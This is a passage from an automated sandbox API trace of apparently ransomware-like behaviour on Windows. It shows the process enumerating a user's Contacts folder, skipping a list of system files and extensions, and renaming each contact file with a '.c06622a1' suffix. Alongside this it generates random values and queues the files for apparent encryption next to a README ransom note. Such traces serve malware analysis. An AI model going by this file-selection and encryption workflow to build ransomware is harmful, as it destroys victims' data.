dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x61c [0147.440] CreateIoCompletionPort (FileHandle=0x61c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0147.441] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4670020 [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4db7315d [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x33c4c225 [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe251f18 [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x28d3143e [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x381c476e [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4c30658d [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7e7892ae [0147.446] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1ba89ab4 [0147.449] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4670094, Length=0x80) returned 0x1c87af53 [0147.449] RtlComputeCrc32 (PartialCrc=0xaf53, Buffer=0x4670094, Length=0x80) returned 0x7f76350c [0147.449] RtlComputeCrc32 (PartialCrc=0x350c, Buffer=0x4670094, Length=0x80) returned 0xbf98b42d [0147.449] RtlComputeCrc32 (PartialCrc=0xb42d, Buffer=0x4670094, Length=0x80) returned 0xcb67638e [0147.449] RtlComputeCrc32 (PartialCrc=0x638e, Buffer=0x4670094, Length=0x80) returned 0x27f57829 [0147.449] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0147.449] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.449] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.449] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0147.449] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0147.449] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0147.449] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0147.449] wcslen (_String="autorun.inf") returned 0xb [0147.449] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0147.449] wcslen (_String="boot.ini") returned 0x8 [0147.449] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0147.449] wcslen (_String="bootfont.bin") returned 0xc [0147.449] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0147.449] wcslen (_String="bootsect.bak") returned 0xc [0147.449] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0147.450] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0147.450] _wcsicmp (_Str1="lulcit amkdfe.contact", _Str2="README.c06622a1.TXT") returned -6 [0147.450] wcsstr (_Str="lulcit amkdfe.contact", _SubStr="README") returned 0x0 [0147.450] _wcsicmp (_Str1="autorun.inf", _Str2="lulcit amkdfe.contact") returned -11 [0147.450] wcslen (_String="autorun.inf") returned 0xb [0147.450] _wcsicmp (_Str1="boot.ini", _Str2="lulcit amkdfe.contact") returned -10 [0147.450] wcslen (_String="boot.ini") returned 0x8 [0147.450] _wcsicmp (_Str1="bootfont.bin", _Str2="lulcit amkdfe.contact") returned -10 [0147.450] wcslen (_String="bootfont.bin") returned 0xc [0147.450] _wcsicmp (_Str1="bootsect.bak", _Str2="lulcit amkdfe.contact") returned -10 [0147.450] wcslen (_String="bootsect.bak") returned 0xc [0147.450] _wcsicmp (_Str1="desktop.ini", _Str2="lulcit amkdfe.contact") returned -8 [0147.450] wcslen (_String="desktop.ini") returned 0xb [0147.450] _wcsicmp (_Str1="iconcache.db", _Str2="lulcit amkdfe.contact") returned -3 [0147.450] wcslen (_String="iconcache.db") returned 0xc [0147.450] _wcsicmp (_Str1="ntldr", _Str2="lulcit amkdfe.contact") returned 2 [0147.450] wcslen (_String="ntldr") returned 0x5 [0147.450] _wcsicmp (_Str1="ntuser.dat", _Str2="lulcit amkdfe.contact") returned 2 [0147.450] wcslen (_String="ntuser.dat") returned 0xa [0147.450] _wcsicmp (_Str1="ntuser.dat.log", _Str2="lulcit amkdfe.contact") returned 2 [0147.450] wcslen (_String="ntuser.dat.log") returned 0xe [0147.450] _wcsicmp (_Str1="ntuser.ini", _Str2="lulcit amkdfe.contact") returned 2 [0147.450] wcslen (_String="ntuser.ini") returned 0xa [0147.450] _wcsicmp (_Str1="thumbs.db", _Str2="lulcit amkdfe.contact") returned 8 [0147.450] wcslen (_String="thumbs.db") returned 0x9 [0147.450] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0147.450] wcslen (_String="386") returned 0x3 [0147.450] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0147.450] wcslen (_String="adv") returned 0x3 [0147.450] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0147.450] wcslen (_String="ani") returned 0x3 [0147.450] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0147.450] wcslen (_String="bat") returned 0x3 [0147.450] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0147.450] wcslen (_String="bin") returned 0x3 [0147.450] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0147.450] wcslen (_String="cab") returned 0x3 [0147.451] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0147.451] wcslen (_String="cmd") returned 0x3 [0147.451] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0147.451] wcslen (_String="com") returned 0x3 [0147.451] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0147.451] wcslen (_String="cpl") returned 0x3 [0147.451] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0147.451] wcslen (_String="cur") returned 0x3 [0147.451] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0147.451] wcslen (_String="deskthemepack") returned 0xd [0147.451] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0147.451] wcslen (_String="diagcab") returned 0x7 [0147.451] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0147.451] wcslen (_String="diagcfg") returned 0x7 [0147.451] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0147.451] wcslen (_String="diagpkg") returned 0x7 [0147.451] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0147.451] wcslen (_String="dll") returned 0x3 [0147.451] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0147.451] wcslen (_String="drv") returned 0x3 [0147.451] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0147.451] wcslen (_String="exe") returned 0x3 [0147.451] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0147.451] wcslen (_String="hlp") returned 0x3 [0147.451] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0147.451] wcslen (_String="icl") returned 0x3 [0147.451] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0147.451] wcslen (_String="icns") returned 0x4 [0147.451] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0147.451] wcslen (_String="ico") returned 0x3 [0147.451] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0147.451] wcslen (_String="ics") returned 0x3 [0147.451] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0147.451] wcslen (_String="idx") returned 0x3 [0147.451] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0147.451] wcslen (_String="ldf") returned 0x3 [0147.451] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0147.452] wcslen (_String="lnk") returned 0x3 [0147.452] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0147.452] wcslen (_String="mod") returned 0x3 [0147.452] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0147.452] wcslen (_String="mpa") returned 0x3 [0147.452] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0147.452] wcslen (_String="msc") returned 0x3 [0147.452] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0147.452] wcslen (_String="msp") returned 0x3 [0147.452] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0147.452] wcslen (_String="msstyles") returned 0x8 [0147.452] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0147.452] wcslen (_String="msu") returned 0x3 [0147.452] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0147.452] wcslen (_String="nls") returned 0x3 [0147.452] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0147.452] wcslen (_String="nomedia") returned 0x7 [0147.452] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0147.452] wcslen (_String="ocx") returned 0x3 [0147.452] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0147.452] wcslen (_String="prf") returned 0x3 [0147.452] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0147.452] wcslen (_String="ps1") returned 0x3 [0147.452] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0147.452] wcslen (_String="rom") returned 0x3 [0147.452] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0147.452] wcslen (_String="rtp") returned 0x3 [0147.452] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0147.452] wcslen (_String="scr") returned 0x3 [0147.452] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0147.452] wcslen (_String="shs") returned 0x3 [0147.452] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0147.452] wcslen (_String="spl") returned 0x3 [0147.452] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0147.452] wcslen (_String="sys") returned 0x3 [0147.452] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0147.452] wcslen (_String="theme") returned 0x5 [0147.452] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0147.453] wcslen (_String="themepack") returned 0x9 [0147.453] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0147.453] wcslen (_String="wpx") returned 0x3 [0147.453] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0147.453] wcslen (_String="lock") returned 0x4 [0147.453] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0147.453] wcslen (_String="key") returned 0x3 [0147.453] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0147.453] wcslen (_String="hta") returned 0x3 [0147.453] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0147.453] wcslen (_String="msi") returned 0x3 [0147.453] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0147.453] wcslen (_String="pdb") returned 0x3 [0147.453] _wcsicmp (_Str1="sql", _Str2="contact") returned 16 [0147.453] wcslen (_String="sql") returned 0x3 [0147.453] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0147.453] wcslen (_String="sqlite") returned 0x6 [0147.453] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.453] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.453] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.453] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0147.453] wcscpy (in: _Dest=0x44d00ce, _Source="lulcit amkdfe.contact" | out: _Dest="lulcit amkdfe.contact") returned="lulcit amkdfe.contact" [0147.453] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact", dwFileAttributes=0x80) returned 1 [0147.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x624 [0147.454] SetFilePointerEx (in: hFile=0x624, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.454] ReadFile (in: hFile=0x624, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0147.455] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x91bf577b [0147.455] RtlComputeCrc32 (PartialCrc=0x577b, Buffer=0x3feb74, Length=0x80) returned 0xea8cae5 [0147.455] RtlComputeCrc32 (PartialCrc=0xcae5, Buffer=0x3feb74, Length=0x80) returned 0xee4b9d8a [0147.455] RtlComputeCrc32 (PartialCrc=0x9d8a, Buffer=0x3feb74, Length=0x80) returned 0x2c0f61d9 [0147.455] RtlComputeCrc32 (PartialCrc=0x61d9, Buffer=0x3feb74, Length=0x80) returned 0x1b1a0963 [0147.455] CloseHandle (hObject=0x624) returned 1 [0147.456] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0147.456] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" [0147.456] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 0x40 [0147.456] wcscpy (in: _Dest=0x44e0100, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0147.456] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.c06622a1"), dwFlags=0x8) returned 1 [0147.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x624 [0147.458] CreateIoCompletionPort (FileHandle=0x624, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0147.458] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x297dc61d [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73230ba [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3ddd8b8 [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7641cc83 [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x577616d0 [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3fc [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51779883 [0147.463] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a1e4cbe [0147.466] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0xb041b5a2 [0147.466] RtlComputeCrc32 (PartialCrc=0xb5a2, Buffer=0x4700094, Length=0x80) returned 0x622ea90c [0147.466] RtlComputeCrc32 (PartialCrc=0xa90c, Buffer=0x4700094, Length=0x80) returned 0x29b2da47 [0147.466] RtlComputeCrc32 (PartialCrc=0xda47, Buffer=0x4700094, Length=0x80) returned 0x821265ea [0147.466] RtlComputeCrc32 (PartialCrc=0x65ea, Buffer=0x4700094, Length=0x80) returned 0x34b447ae [0147.466] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0147.467] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0147.467] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0147.467] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6738320, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd6738320, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd6738320, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0147.467] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0147.467] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0147.467] _wcsicmp (_Str1="sikvnb huvuib.contact", _Str2="README.c06622a1.TXT") returned 1 [0147.467] wcsstr (_Str="sikvnb huvuib.contact", _SubStr="README") returned 0x0 [0147.467] _wcsicmp (_Str1="autorun.inf", _Str2="sikvnb huvuib.contact") returned -18 [0147.467] wcslen (_String="autorun.inf") returned 0xb [0147.467] _wcsicmp (_Str1="boot.ini", _Str2="sikvnb huvuib.contact") returned -17 [0147.467] wcslen (_String="boot.ini") returned 0x8 [0147.467] _wcsicmp (_Str1="bootfont.bin", _Str2="sikvnb huvuib.contact") returned -17 [0147.467] wcslen (_String="bootfont.bin") returned 0xc [0147.467] _wcsicmp (_Str1="bootsect.bak", _Str2="sikvnb huvuib.contact") returned -17 [0147.467] wcslen (_String="bootsect.bak") returned 0xc [0147.467] _wcsicmp (_Str1="desktop.ini", _Str2="sikvnb huvuib.contact") returned -15 [0147.467] wcslen (_String="desktop.ini") returned 0xb [0147.467] _wcsicmp (_Str1="iconcache.db", _Str2="sikvnb huvuib.contact") returned -10 [0147.467] wcslen (_String="iconcache.db") returned 0xc [0147.467] _wcsicmp (_Str1="ntldr", _Str2="sikvnb huvuib.contact") returned -5 [0147.467] wcslen (_String="ntldr") returned 0x5 [0147.467] _wcsicmp (_Str1="ntuser.dat", _Str2="sikvnb huvuib.contact") returned -5 [0147.467] wcslen (_String="ntuser.dat") returned 0xa [0147.467] _wcsicmp (_Str1="ntuser.dat.log", _Str2="sikvnb huvuib.contact") returned -5 [0147.467] wcslen (_String="ntuser.dat.log") returned 0xe [0147.467] _wcsicmp (_Str1="ntuser.ini", _Str2="sikvnb huvuib.contact") returned -5 [0147.467] wcslen (_String="ntuser.ini") returned 0xa [0147.467] _wcsicmp (_Str1="thumbs.db", _Str2="sikvnb huvuib.contact") returned 1 [0147.467] wcslen (_String="thumbs.db") returned 0x9 [0147.467] _wcsicmp (_Str1="386", _Str2="contact") returned -48 [0147.467] wcslen (_String="386") returned 0x3 [0147.467] _wcsicmp (_Str1="adv", _Str2="contact") returned -2 [0147.467] wcslen (_String="adv") returned 0x3 [0147.468] _wcsicmp (_Str1="ani", _Str2="contact") returned -2 [0147.468] wcslen (_String="ani") returned 0x3 [0147.468] _wcsicmp (_Str1="bat", _Str2="contact") returned -1 [0147.468] wcslen (_String="bat") returned 0x3 [0147.468] _wcsicmp (_Str1="bin", _Str2="contact") returned -1 [0147.468] wcslen (_String="bin") returned 0x3 [0147.468] _wcsicmp (_Str1="cab", _Str2="contact") returned -14 [0147.468] wcslen (_String="cab") returned 0x3 [0147.468] _wcsicmp (_Str1="cmd", _Str2="contact") returned -2 [0147.468] wcslen (_String="cmd") returned 0x3 [0147.468] _wcsicmp (_Str1="com", _Str2="contact") returned -1 [0147.468] wcslen (_String="com") returned 0x3 [0147.468] _wcsicmp (_Str1="cpl", _Str2="contact") returned 1 [0147.468] wcslen (_String="cpl") returned 0x3 [0147.468] _wcsicmp (_Str1="cur", _Str2="contact") returned 6 [0147.468] wcslen (_String="cur") returned 0x3 [0147.468] _wcsicmp (_Str1="deskthemepack", _Str2="contact") returned 1 [0147.468] wcslen (_String="deskthemepack") returned 0xd [0147.468] _wcsicmp (_Str1="diagcab", _Str2="contact") returned 1 [0147.468] wcslen (_String="diagcab") returned 0x7 [0147.468] _wcsicmp (_Str1="diagcfg", _Str2="contact") returned 1 [0147.468] wcslen (_String="diagcfg") returned 0x7 [0147.468] _wcsicmp (_Str1="diagpkg", _Str2="contact") returned 1 [0147.468] wcslen (_String="diagpkg") returned 0x7 [0147.468] _wcsicmp (_Str1="dll", _Str2="contact") returned 1 [0147.468] wcslen (_String="dll") returned 0x3 [0147.468] _wcsicmp (_Str1="drv", _Str2="contact") returned 1 [0147.468] wcslen (_String="drv") returned 0x3 [0147.468] _wcsicmp (_Str1="exe", _Str2="contact") returned 2 [0147.468] wcslen (_String="exe") returned 0x3 [0147.468] _wcsicmp (_Str1="hlp", _Str2="contact") returned 5 [0147.468] wcslen (_String="hlp") returned 0x3 [0147.468] _wcsicmp (_Str1="icl", _Str2="contact") returned 6 [0147.468] wcslen (_String="icl") returned 0x3 [0147.468] _wcsicmp (_Str1="icns", _Str2="contact") returned 6 [0147.468] wcslen (_String="icns") returned 0x4 [0147.468] _wcsicmp (_Str1="ico", _Str2="contact") returned 6 [0147.468] wcslen (_String="ico") returned 0x3 [0147.469] _wcsicmp (_Str1="ics", _Str2="contact") returned 6 [0147.469] wcslen (_String="ics") returned 0x3 [0147.469] _wcsicmp (_Str1="idx", _Str2="contact") returned 6 [0147.469] wcslen (_String="idx") returned 0x3 [0147.469] _wcsicmp (_Str1="ldf", _Str2="contact") returned 9 [0147.469] wcslen (_String="ldf") returned 0x3 [0147.469] _wcsicmp (_Str1="lnk", _Str2="contact") returned 9 [0147.469] wcslen (_String="lnk") returned 0x3 [0147.469] _wcsicmp (_Str1="mod", _Str2="contact") returned 10 [0147.469] wcslen (_String="mod") returned 0x3 [0147.469] _wcsicmp (_Str1="mpa", _Str2="contact") returned 10 [0147.469] wcslen (_String="mpa") returned 0x3 [0147.469] _wcsicmp (_Str1="msc", _Str2="contact") returned 10 [0147.469] wcslen (_String="msc") returned 0x3 [0147.469] _wcsicmp (_Str1="msp", _Str2="contact") returned 10 [0147.469] wcslen (_String="msp") returned 0x3 [0147.469] _wcsicmp (_Str1="msstyles", _Str2="contact") returned 10 [0147.469] wcslen (_String="msstyles") returned 0x8 [0147.469] _wcsicmp (_Str1="msu", _Str2="contact") returned 10 [0147.469] wcslen (_String="msu") returned 0x3 [0147.469] _wcsicmp (_Str1="nls", _Str2="contact") returned 11 [0147.469] wcslen (_String="nls") returned 0x3 [0147.469] _wcsicmp (_Str1="nomedia", _Str2="contact") returned 11 [0147.469] wcslen (_String="nomedia") returned 0x7 [0147.469] _wcsicmp (_Str1="ocx", _Str2="contact") returned 12 [0147.469] wcslen (_String="ocx") returned 0x3 [0147.469] _wcsicmp (_Str1="prf", _Str2="contact") returned 13 [0147.469] wcslen (_String="prf") returned 0x3 [0147.469] _wcsicmp (_Str1="ps1", _Str2="contact") returned 13 [0147.469] wcslen (_String="ps1") returned 0x3 [0147.469] _wcsicmp (_Str1="rom", _Str2="contact") returned 15 [0147.469] wcslen (_String="rom") returned 0x3 [0147.469] _wcsicmp (_Str1="rtp", _Str2="contact") returned 15 [0147.469] wcslen (_String="rtp") returned 0x3 [0147.469] _wcsicmp (_Str1="scr", _Str2="contact") returned 16 [0147.469] wcslen (_String="scr") returned 0x3 [0147.469] _wcsicmp (_Str1="shs", _Str2="contact") returned 16 [0147.469] wcslen (_String="shs") returned 0x3 [0147.470] _wcsicmp (_Str1="spl", _Str2="contact") returned 16 [0147.470] wcslen (_String="spl") returned 0x3 [0147.470] _wcsicmp (_Str1="sys", _Str2="contact") returned 16 [0147.470] wcslen (_String="sys") returned 0x3 [0147.470] _wcsicmp (_Str1="theme", _Str2="contact") returned 17 [0147.470] wcslen (_String="theme") returned 0x5 [0147.470] _wcsicmp (_Str1="themepack", _Str2="contact") returned 17 [0147.470] wcslen (_String="themepack") returned 0x9 [0147.470] _wcsicmp (_Str1="wpx", _Str2="contact") returned 20 [0147.470] wcslen (_String="wpx") returned 0x3 [0147.470] _wcsicmp (_Str1="lock", _Str2="contact") returned 9 [0147.470] wcslen (_String="lock") returned 0x4 [0147.470] _wcsicmp (_Str1="key", _Str2="contact") returned 8 [0147.470] wcslen (_String="key") returned 0x3 [0147.470] _wcsicmp (_Str1="hta", _Str2="contact") returned 5 [0147.470] wcslen (_String="hta") returned 0x3 [0147.470] _wcsicmp (_Str1="msi", _Str2="contact") returned 10 [0147.470] wcslen (_String="msi") returned 0x3 [0147.470] _wcsicmp (_Str1="pdb", _Str2="contact") returned 13 [0147.470] wcslen (_String="pdb") returned 0x3 [0147.470] _wcsicmp (_Str1="sql", _Str2="contact") returned 16 [0147.470] wcslen (_String="sql") returned 0x3 [0147.470] _wcsicmp (_Str1="sqlite", _Str2="contact") returned 16 [0147.470] wcslen (_String="sqlite") returned 0x6 [0147.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0147.470] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0147.470] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts" [0147.470] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts") returned 0x2a [0147.470] wcscpy (in: _Dest=0x44d00ce, _Source="sikvnb huvuib.contact" | out: _Dest="sikvnb huvuib.contact") returned="sikvnb huvuib.contact" [0147.470] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact", dwFileAttributes=0x80) returned 1 [0147.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 